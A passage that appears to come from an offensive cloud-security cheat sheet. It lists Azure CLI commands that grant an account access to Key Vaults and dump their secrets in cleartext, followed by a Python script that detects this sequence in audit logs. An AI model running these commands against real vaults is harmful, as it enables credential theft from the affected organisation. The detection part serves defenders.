Data Exfiltration

- Azure Key Vaults Dumping

To list all the Key Vault resources that the current account can view:

az keyvault list --query '[].name' --output tsv

To set the access policy on a specified Key Vault, granting the specified user permission to get and list secrets, keys, storage accounts, and certificates:

az keyvault set-policy --name <KeyVaultName> --upn <YourContributorUsername> --secret-permissions get list --key-permissions get list --storage-permissions get list --certificate-permissions get list

To get the URIs of the secrets in a Key Vault:

az keyvault secret list --vault-name <KeyVaultName> --query '[].id' --output tsv

To retrieve a secret from the Key Vault in cleartext using the secret's URI:

az keyvault secret show --id <URI from last command> | ConvertFrom-Json
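
The sequence above (access policy change, then secret listing, then secret reads by the same account) leaves a recognisable trail in Key Vault audit logging. The following is an added detection example, not part of the original page. It assumes log records already normalised to the hypothetical fields `time`, `vault`, `operation` and `caller`, and assumes the policy change is logged as `VaultPut` or `VaultPatch`; the sample events are constructed.

```python
from datetime import datetime, timedelta

# Key Vault audit operation names; POLICY_OPS is an assumption about how
# an access policy update is logged in your environment.
POLICY_OPS = {"VaultPut", "VaultPatch"}
READ_OPS = {"SecretList", "SecretGet"}

def find_policy_then_dump(events, window=timedelta(minutes=30)):
    """Flag callers who change a vault's access policy and then both list
    and read its secrets within `window` of that change."""
    events = sorted(events, key=lambda e: e["time"])
    findings = []
    for i, ev in enumerate(events):
        if ev["operation"] not in POLICY_OPS:
            continue
        reads = [e for e in events[i + 1:]
                 if e["vault"] == ev["vault"]
                 and e["caller"] == ev["caller"]
                 and e["operation"] in READ_OPS
                 and e["time"] - ev["time"] <= window]
        # Require both the enumeration and at least one cleartext read.
        if {e["operation"] for e in reads} == READ_OPS:
            findings.append({
                "vault": ev["vault"],
                "caller": ev["caller"],
                "policy_change": ev["time"],
                "secrets_read": sum(e["operation"] == "SecretGet" for e in reads),
            })
    return findings

def _ev(ts, vault, op, caller):
    return {"time": datetime.fromisoformat(ts), "vault": vault,
            "operation": op, "caller": caller}

# Constructed sample events (names and addresses are placeholders).
SAMPLE = [
    _ev("2024-01-10T09:00:00", "kv-prod", "SecretGet", "app-svc@example.com"),
    _ev("2024-01-10T10:02:00", "kv-prod", "VaultPatch", "contrib@example.com"),
    _ev("2024-01-10T10:03:10", "kv-prod", "SecretList", "contrib@example.com"),
    _ev("2024-01-10T10:03:40", "kv-prod", "SecretGet", "contrib@example.com"),
    _ev("2024-01-10T10:03:55", "kv-prod", "SecretGet", "contrib@example.com"),
    _ev("2024-01-10T11:00:00", "kv-dev", "VaultPatch", "admin@example.com"),
    _ev("2024-01-10T15:00:00", "kv-dev", "SecretGet", "admin@example.com"),
]

if __name__ == "__main__":
    for f in find_policy_then_dump(SAMPLE):
        print(f)
```

Routine application reads and policy changes with no follow-on enumeration are not flagged; tune `window` to how quickly legitimate administrators normally read secrets after a policy change.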
